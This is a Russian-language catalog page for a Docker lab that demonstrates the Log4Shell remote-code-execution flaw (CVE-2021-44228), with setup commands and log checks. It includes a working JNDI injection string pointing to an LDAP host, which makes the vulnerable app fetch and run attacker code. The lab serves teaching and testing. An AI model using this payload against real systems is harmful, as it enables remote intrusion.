Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4j-rce-CVE-2021-44228 — log4j2 CVE-2021-44228 POC | Kitploit
Инструменты/GitHubGitHub/1hakusai1/log4j-rce-cve-2021-44228
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHub1hakusai1/log4j-rce-cve-2021-44228

log4j-rce-CVE-2021-44228

log4j2 CVE-2021-44228 POC

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Обзор

Это проект для практической проверки уязвимости удаленного выполнения кода в log4j2 (CVE-2021-44228).

Запуск контейнеров

root@kitploit:~
docker-compose up

Контейнеру log4j требуется некоторое время, чтобы стать доступным после запуска. Проверьте статус с помощью следующей команды:

root@kitploit:~
docker logs -f log4j

Когда появится сообщение Server started: Listening on port 8081, контейнер готов к работе.

Проверка состояния до атаки

Проверьте содержимое каталога /root в контейнере log4j:

root@kitploit:~
docker exec log4j ls /root

В исходном состоянии присутствует только каталог work.

Выполнение атаки

Откройте http://localhost:8081/. Это простое приложение, которое выводит введенное в форму имя на экран и в лог.

Введите ${jndi:ldap://ldap.example.com/cn=java,dc=example,dc=com} в форму и отправьте.

Снова проверьте каталог /root контейнера log4j:

root@kitploit:~
docker exec log4j ls /root

Должен выполниться подготовленный злоумышленником код, и будут созданы файлы, которых ранее не было. Имена файлов содержат временные метки, поэтому с каждой атакой будет появляться новый файл.

Просмотрев логи контейнера ldap, вы увидите, что из контейнера log4j пришел SEARCH запрос:

root@kitploit:~
docker logs ldap

Просмотрев логи tomcat в контейнере web, вы увидите, что из контейнера log4j был запрос к Exploit.class (классу, используемому для атаки):

root@kitploit:~
docker exec -it web bash
cat /usr/local/tomcat/logs/localhost_access_log.*
Скачать инструмент